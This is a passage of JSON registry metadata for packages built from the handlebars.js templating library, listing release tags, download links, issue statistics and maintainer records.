.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6-2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.5beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0.beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@0.9.0.pre.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2025-11-04T01:08:48.953Z","dependent_packages_count":0,"downloads":null,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{},"purl":"pkg:npm/handlebars-jaylinski-test","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/handlebars-jaylinski-test","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/handlebars-jaylinski-test","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/handlebars-jaylinski-test/dependencies","status":"unpublished","funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-29T02:01:58.807Z","issues_count":151,"pull_requests_count":103,"avg_time_to_close_issue":20331079.744897958,"avg_time_to_close_pull_request":20206605.742857143,"issues_closed_count":98,"pull_requests_closed_count":70,"pull_request_authors_count":40,"issue_authors_count":134,"avg_comments_per_issue":3.1788079470198674,"avg_comments_per_pull_request":1.7087378640776698,"merged_pull_requests_count":42,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":22,"past_year_pull_requests_count":14,"past_year_avg_time_to_close_issue":3394153.3333333335,"past_year_avg_time_to_close_pull_request":115209.33333333333,"past_year_issues_closed_count":6,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":20,"past_year_avg_comments_per_issue":0.7727272727272727,"past_year_avg_comments_per_pull_request":0.5,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":2,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski-test/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski-test/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski-test/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski-test/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski-test/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/handlebars-jaylinski-test/codemeta","maintainers":[{"uuid":"jaylinski","login":"jaylinski","name":null,"email":"jakob.linskeseder@gmail.com","url":null,"packages_count":7,"html_url":"https://www.npmjs.com/~jaylinski","role":null,"created_at":"2023-07-27T21:25:07.131Z","updated_at":"2023-07-27T21:25:07.131Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jaylinski/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":221723,"name":"handlebars-source","ecosystem":"rubygems","description":"Handlebars.js source code wrapper for (pre)compilation gems.","homepage":"https://github.com/handlebars-lang/handlebars.js/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":[],"namespace":null,"versions_count":71,"first_release_published_at":"2013-02-20T05:47:21.697Z","latest_release_published_at":"2026-03-26T21:23:13.163Z","latest_release_number":"4.7.9","last_synced_at":"2026-07-22T01:31:09.515Z","created_at":"2022-04-06T00:25:50.100Z","updated_at":"2026-07-22T01:31:09.515Z","registry_url":"https://rubygems.org/gems/handlebars-source","install_command":"gem install handlebars-source -s https://rubygems.org","documentation_url":"http://www.rubydoc.info/gems/handlebars-source/","metadata":{"funding":null},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2024-09-03T20:27:37.000Z","size":4058,"stargazers_count":17990,"open_issues_count":94,"forks_count":2042,"subscribers_count":451,"default_branch":"master","last_synced_at":"2024-10-29T20:37:55.598Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2024-10-29T10:55:41.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222119788,"owners_count":16934949,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2